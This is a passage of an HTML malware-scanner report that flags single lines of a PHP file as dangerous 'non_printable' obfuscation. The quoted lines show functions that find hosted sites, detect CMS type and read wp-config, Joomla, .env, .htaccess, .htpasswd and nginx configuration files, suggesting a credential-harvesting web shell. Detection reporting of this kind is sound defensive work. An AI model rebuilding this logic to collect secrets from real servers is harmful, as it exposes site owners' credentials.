</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1219</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">find_public_html_in_path</span><span style="color: #007700">(</span><span style="color: #0000BB">$start</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 121</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">up_to_run_app</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1220</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">null</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1227</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$path</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1232</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">find_account_paths</span><span style="color: #007700">(</span><span style="color: #0000BB">$current_dir</span><span style="color: #007700">, </span><span style="color: #0000BB">$root_dir</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1243</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$paths</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1246</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">path_is_deep_subfolder</span><span style="color: #007700">(</span><span style="color: #0000BB">$path</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1247</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return (bool) </span><span style="color: #0000BB">preg_match</span><span style="color: #007700">(</span><span style="color: #DD0000">'#/(wp-content|themes|plugins|mu-plugins|dist|vendor|node_modules|cache|uploads)(/|$)#i'</span><span style="color: #007700">, </span><span style="color: #0000BB">$path</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1250</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">collect_scan_dir_candidates</span><span style="color: #007700">(</span><span style="color: #0000BB">$current_dir</span><span style="color: #007700">, </span><span style="color: #0000BB">$root_dir</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 12</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">up_to_wp_mode</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1307</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">array_values</span><span style="color: #007700">(</span><span style="color: #0000BB">$unique</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1310</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">score_scan_candidate</span><span style="color: #007700">(</span><span style="color: #0000BB">$dir</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1333</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$score</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1336</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">resolve_scan_roots</span><span style="color: #007700">(</span><span style="color: #0000BB">$current_dir</span><span style="color: #007700">, </span><span style="color: #0000BB">$root_dir</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1340</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return array(</span><span style="color: #0000BB">$path</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1350</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$b</span><span style="color: #007700">[</span><span style="color: #DD0000">'score'</span><span style="color: #007700">] - </span><span style="color: #0000BB">$a</span><span style="color: #007700">[</span><span style="color: #DD0000">'score'</span><span style="color: #007700">];</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1351</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">strlen</span><span style="color: #007700">(</span><span style="color: #0000BB">$a</span><span style="color: #007700">[</span><span style="color: #DD0000">'path'</span><span style="color: #007700">]) - </span><span style="color: #0000BB">strlen</span><span style="color: #007700">(</span><span style="color: #0000BB">$b</span><span style="color: #007700">[</span><span style="color: #DD0000">'path'</span><span style="color: #007700">]);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1385</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">array_slice</span><span style="color: #007700">(</span><span style="color: #0000BB">$readable</span><span style="color: #007700">, </span><span style="color: #0000BB">0</span><span style="color: #007700">, </span><span style="color: #0000BB">10</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1393</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">parse_env</span><span style="color: #007700">(</span><span style="color: #0000BB">$path</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 13</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">defined</span><span style="color: #007700">(</span><span style="color: #DD0000">'UP_TO_WP_MODE'</span><span style="color: #007700">) && </span><span style="color: #0000BB">UP_TO_WP_MODE</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1403</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$vars</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1405</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">parse_wp_config</span><span style="color: #007700">(</span><span style="color: #0000BB">$path</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1415</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">parse_joomla_config</span><span style="color: #007700">(</span><span style="color: #0000BB">$path</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1423</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">parse_htaccess</span><span style="color: #007700">(</span><span style="color: #0000BB">$path</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1435</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$result</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1437</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">parse_htpasswd</span><span style="color: #007700">(</span><span style="color: #0000BB">$path</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1445</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$users</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1447</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">find_nginx_config</span><span style="color: #007700">(</span><span style="color: #0000BB">$site_name</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1450</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$p</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1458</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$fp</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1463</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">parse_nginx_config</span><span style="color: #007700">(</span><span style="color: #0000BB">$path</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1473</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">detect_cms</span><span style="color: #007700">(</span><span style="color: #0000BB">$dir</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1494</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$cms</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1495</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #DD0000">'WordPress (no config)'</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1496</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #DD0000">'Joomla (no config)'</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1497</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #DD0000">'Unknown (has .env)'</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1498</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #DD0000">'Static / Unknown'</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1499</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #DD0000">'Empty / Not a site'</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1501</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">build_site_entry</span><span style="color: #007700">(</span><span style="color: #0000BB">$name</span><span style="color: #007700">, </span><span style="color: #0000BB">$full</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 150</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">app_pwd_salt</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1514</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return array(</span><span style="color: #DD0000">'name'</span><span style="color: #007700">=></span><span style="color: #0000BB">$name</span><span style="color: #007700">,</span><span style="color: #DD0000">'path'</span><span style="color: #007700">=></span><span style="color: #0000BB">$full</span><span style="color: #007700">,</span><span style="color: #DD0000">'cms'</span><span style="color: #007700">=></span><span style="color: #0000BB">$cms</span><span style="color: #007700">,</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 151</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #DD0000">'u2_scan_v1'</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1523</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">dir_looks_like_site</span><span style="color: #007700">(</span><span style="color: #0000BB">$dir</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1528</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">detect_cms</span><span style="color: #007700">(</span><span style="color: #0000BB">$dir</span><span style="color: #007700">) !== </span><span style="color: #DD0000">'Empty / Not a site'</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1531</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">scan_sites</span><span style="color: #007700">(</span><span style="color: #0000BB">$dir</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1533</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return array(</span><span style="color: #DD0000">'error'</span><span style="color: #007700">=></span><span style="color: #DD0000">'Cannot read: '</span><span style="color: #007700">.</span><span style="color: #0000BB">$dir</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 153</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">app_password_expected_hash</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1545</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function(</span><span style="color: #0000BB">$a</span><span style="color: #007700">,</span><span style="color: #0000BB">$b</span><span style="color: #007700">){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1548</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$ar</span><span style="color: #007700">!==</span><span style="color: #0000BB">$br</span><span style="color: #007700">?</span><span style="color: #0000BB">$ar</span><span style="color: #007700">-</span><span style="color: #0000BB">$br</span><span style="color: #007700">:</span><span style="color: #0000BB">strcmp</span><span style="color: #007700">(</span><span style="color: #0000BB">$a</span><span style="color: #007700">[</span><span style="color: #DD0000">'name'</span><span style="color: #007700">],</span><span style="color: #0000BB">$b</span><span style="color: #007700">[</span><span style="color: #DD0000">'name'</span><span style="color: #007700">]);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1550</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$sites</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1553</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">scan_sites_from_roots</span><span style="color: #007700">(</span><span style="color: #0000BB">$roots</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 155</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">base64_decode</span><span style="color: #007700">(</span><span style="color: #0000BB">$_APP_PWD_CIPHER</span><span style="color: #007700">, </span><span style="color: #0000BB">true</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 156</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return (</span><span style="color: #0000BB">$raw </span><span style="color: #007700">!== </span><span style="color: #0000BB">false </span><span style="color: #007700">&& </span><span style="color: #0000BB">strlen</span><span style="color: #007700">(</span><span style="color: #0000BB">$raw</span><span style="color: #007700">) === </span><span style="color: #0000BB">32</span><span style="color: #007700">) ? </span><span style="color: #0000BB">$raw </span><span style="color: #007700">: </span><span style="color: #DD0000">''</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1579</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$ar</span><span style="color: #007700">!==</span><span style="color: #0000BB">$br</span><span style="color: #007700">?</span><span style="color: #0000BB">$ar</span><span style="color: #007700">-</span><span style="color: #0000BB">$br</span><span style="color: #007700">:</span><span style="color: #0000BB">strcmp</span><span style="color: #007700">(</span><span style="color: #0000BB">$a</span><span style="color: #007700">[</span><span style="color: #DD0000">'name'</span><span style="color: #007700">], </span><span style="color: #0000BB">$b</span><span style="color: #007700">[</span><span style="color: #DD0000">'name'</span><span style="color: #007700">]);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1582</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
